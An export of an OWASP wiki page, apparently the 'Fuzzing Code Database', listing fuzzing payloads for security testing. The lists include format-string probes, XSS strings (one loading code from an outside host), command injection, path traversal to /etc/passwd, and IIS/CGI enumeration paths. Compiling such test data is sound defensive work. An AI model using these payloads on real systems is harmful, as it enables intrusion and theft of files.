&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: 30 July 2007 - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Full List&lt;br /&gt;
# Format String tests to determine errors in variable handling&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] [[:User:Adam.muntner|'''Adam Muntner''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=81138</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=81138"/>
				<updated>2010-04-08T18:34:27Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* Microsoft IIS vulnerabilities and enumeration (6 April 2010) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''17 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563)&lt;br /&gt;
*Created new Category: Windows Directory Traversal (Update: 17 March 2010 - Total Statements: 16)&lt;br /&gt;
*Created new Category: Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879)&lt;br /&gt;
*Created new Category: Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)&lt;br /&gt;
*Created new Category: File Upload Filter Bypass (Update: 17 March 2010 - Total Statements: 4)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)&lt;br /&gt;
*Created new Category: Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)&lt;br /&gt;
*Created new Category: Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)&lt;br /&gt;
&lt;br /&gt;
'''16 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)&lt;br /&gt;
*Created new Category: Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) &lt;br /&gt;
*Created new Category: Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
*Created new Category: All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2010 - Total Statements: 31)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Microsoft URLs (18 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Interesting IIS Files &amp;amp; Directories (17 March, 2009)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
# Look at the result codes in the headers - 403 likely mean the dir exists, 404  means not. It takes an ISAPI filter for IIS to return 404's for 403s. &lt;br /&gt;
# Altetrnatively, slight differences in the number of bytes returned will help differentiate.&lt;br /&gt;
&lt;br /&gt;
.printer&lt;br /&gt;
/%NETHOOD%/&lt;br /&gt;
/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.aspx&lt;br /&gt;
/Exadmin/&lt;br /&gt;
/ExchWeb/&lt;br /&gt;
/Exchange/&lt;br /&gt;
/Microsoft-Server-ActiveSync/&lt;br /&gt;
/OMA/&lt;br /&gt;
/OWA/&lt;br /&gt;
/Public/&lt;br /&gt;
/_layouts/alllibs.htm&lt;br /&gt;
/_layouts/settings.htm&lt;br /&gt;
/_layouts/userinfo.htm&lt;br /&gt;
/_vti_bin/&lt;br /&gt;
/_vti_bin/_vti_aut/fp30reg.dll&lt;br /&gt;
/_vti_pvt/&lt;br /&gt;
/_WEB_INF/&lt;br /&gt;
/a%5c.aspx&lt;br /&gt;
/adovbs.inc&lt;br /&gt;
/aspnet_files/&lt;br /&gt;
/certcontrol/&lt;br /&gt;
/certenroll/&lt;br /&gt;
/certsrv/&lt;br /&gt;
/exchange/root.asp&lt;br /&gt;
/forum.asp&lt;br /&gt;
/forum_arc.asp&lt;br /&gt;
/forum_professionnel.asp&lt;br /&gt;
/iisadmin/&lt;br /&gt;
/iishelp/&lt;br /&gt;
/iishelp/iis/misc/default.asp&lt;br /&gt;
/iissamples/&lt;br /&gt;
/imprimer.asp&lt;br /&gt;
/includes/adovbs.inc&lt;br /&gt;
/msadc/&lt;br /&gt;
/null.htw&lt;br /&gt;
/pbserver/pbserver.dll&lt;br /&gt;
/postinfo.html&lt;br /&gt;
/rubrique.asp&lt;br /&gt;
/scripts/&lt;br /&gt;
/share/&lt;br /&gt;
/tsweb/&lt;br /&gt;
/~/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.asp&lt;br /&gt;
/~/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.aspx&lt;br /&gt;
index.shtml&lt;br /&gt;
x.htw&lt;br /&gt;
x.ida&lt;br /&gt;
x.idq&lt;br /&gt;
/citrix/&lt;br /&gt;
/citrix/AccessPlatform/auth/&lt;br /&gt;
/citrix/AccessPlatform/auth/clientscripts/&lt;br /&gt;
/AccessPlatform/auth/clientscripts/&lt;br /&gt;
/AccessPlatform/&lt;br /&gt;
/AccessPlatform/auth/&lt;br /&gt;
/AccessPlatform/auth/clientscripts/cookies.js &lt;br /&gt;
/AccessPlatform/auth/clientscripts/login.js &lt;br /&gt;
/Citrix//AccessPlatform/auth/clientscripts/cookies.js &lt;br /&gt;
/Citrix/AccessPlatform/auth/clientscripts/login.js &lt;br /&gt;
/Citrix/PNAgent/config.xml&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (17 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calendar/index.cgi&lt;br /&gt;
calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calender_admin.pl&lt;br /&gt;
campas?%0acat%0a{KNOWNFILE}%0a&lt;br /&gt;
cart.pl&lt;br /&gt;
cart.pl?db='&lt;br /&gt;
cartmanager.cgi&lt;br /&gt;
cbmc/forums.cgi&lt;br /&gt;
ccbill-local.cgi?cmd=MENU&lt;br /&gt;
ccbill-local.pl?cmd=MENU&lt;br /&gt;
cgforum.cgi&lt;br /&gt;
cgi-lib.pl&lt;br /&gt;
cgicso?query=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cgicso?query=AAA&lt;br /&gt;
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
cgiwrap&lt;br /&gt;
cgiwrap/%3Cfont%20color=red%3E&lt;br /&gt;
cgiwrap/~@U&lt;br /&gt;
cgiwrap/~JUNK(5)&lt;br /&gt;
cgiwrap/~root&lt;br /&gt;
change-your-password.pl&lt;br /&gt;
classified.cgi&lt;br /&gt;
classifieds&lt;br /&gt;
classifieds.cgi&lt;br /&gt;
classifieds/classifieds.cgi&lt;br /&gt;
classifieds/index.cgi&lt;br /&gt;
clickcount.pl?view=test&lt;br /&gt;
clickresponder.pl&lt;br /&gt;
code.php&lt;br /&gt;
code.php3&lt;br /&gt;
com5..........................................................................................................................................................................................................................box&lt;br /&gt;
com5.java&lt;br /&gt;
com5.pl&lt;br /&gt;
commandit.cgi&lt;br /&gt;
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html&lt;br /&gt;
common.php?f=0&amp;amp;ForumLang=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
common/listrec.pl&lt;br /&gt;
common/listrec.pl?APP=qmh-news&amp;amp;TEMPLATE=;ls%20/etc|&lt;br /&gt;
compatible.cgi&lt;br /&gt;
count.cgi&lt;br /&gt;
counter-ord&lt;br /&gt;
counterbanner&lt;br /&gt;
counterbanner-ord&lt;br /&gt;
counterfiglet-ord&lt;br /&gt;
counterfiglet/nc/&lt;br /&gt;
cs&lt;br /&gt;
csChatRBox.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csGuestBook.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csLive&lt;br /&gt;
csNews.cgi&lt;br /&gt;
csNewsPro.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csPassword.cgi&lt;br /&gt;
csPassword/csPassword.cgi&lt;br /&gt;
csh&lt;br /&gt;
cstat.pl&lt;br /&gt;
cutecast/members/&lt;br /&gt;
cvsblame.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=*&amp;amp;rev=&amp;amp;root=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?branch=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;date=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=&amp;amp;dir=&amp;amp;file=&amp;amp;who=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;sortby=Date&amp;amp;hours=2&amp;amp;date=week&lt;br /&gt;
cvsqueryform.cgi?cvsroot=/cvsroot&amp;amp;module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=HEAD&lt;br /&gt;
dansguardian.pl?DENIEDURL=&amp;lt;/a&amp;gt;&amp;lt;script&amp;gt;alert('XSS');&amp;lt;/script&amp;gt;&lt;br /&gt;
dasp/fm_shell.asp&lt;br /&gt;
data/fetch.php?page=&lt;br /&gt;
date&lt;br /&gt;
day5datacopier.cgi&lt;br /&gt;
day5datanotifier.cgi&lt;br /&gt;
db2www/library/document.d2w/show&lt;br /&gt;
db4web_c/dbdirname/{KNOWNFILE}&lt;br /&gt;
db_manager.cgi&lt;br /&gt;
dbman/db.cgi?db=no-db&lt;br /&gt;
dcforum.cgi?az=list&amp;amp;forum=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
dcshop/auth_data/auth_user_file.txt&lt;br /&gt;
dcshop/orders/orders.txt&lt;br /&gt;
dfire.cgi&lt;br /&gt;
diagnose.cgi&lt;br /&gt;
dig.cgi&lt;br /&gt;
directorypro.cgi?want=showcat&amp;amp;show=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
displayTC.pl&lt;br /&gt;
dnewsweb&lt;br /&gt;
donothing&lt;br /&gt;
dose.pl?daily&amp;amp;somefile.txt&amp;amp;|ls|&lt;br /&gt;
download.cgi&lt;br /&gt;
dumpenv.pl&lt;br /&gt;
edit.pl&lt;br /&gt;
empower?DB=whateverwhatever&lt;br /&gt;
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
enter.cgi&lt;br /&gt;
environ.cgi&lt;br /&gt;
environ.pl&lt;br /&gt;
environ.pl?param1=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
eshop.pl/seite=;cat%20eshop.pl|&lt;br /&gt;
ex-logger.pl&lt;br /&gt;
excite&lt;br /&gt;
excite;IF&lt;br /&gt;
ezadmin.cgi&lt;br /&gt;
ezboard.cgi&lt;br /&gt;
ezman.cgi&lt;br /&gt;
ezshopper/loadpage.cgi?user_id=1&amp;amp;file=|cat%20{KNOWNFILE}|&lt;br /&gt;
ezshopper/search.cgi?user_id=id&amp;amp;database=dbase1.exm&amp;amp;template=../../../../../../..{KNOWNFILE}&amp;amp;distinct=1&lt;br /&gt;
ezshopper2/loadpage.cgi&lt;br /&gt;
ezshopper3/loadpage.cgi&lt;br /&gt;
faqmanager.cgi?toc={KNOWNFILE}%00&lt;br /&gt;
faxsurvey?cat%20{KNOWNFILE}&lt;br /&gt;
filemail&lt;br /&gt;
filemail.pl&lt;br /&gt;
finger&lt;br /&gt;
finger.pl&lt;br /&gt;
flexform&lt;br /&gt;
flexform.cgi&lt;br /&gt;
fom.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
fom/fom.cgi?cmd=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=1&amp;amp;keywords=vulnerable&lt;br /&gt;
formmail&lt;br /&gt;
formmail.cgi&lt;br /&gt;
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail.pl&lt;br /&gt;
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
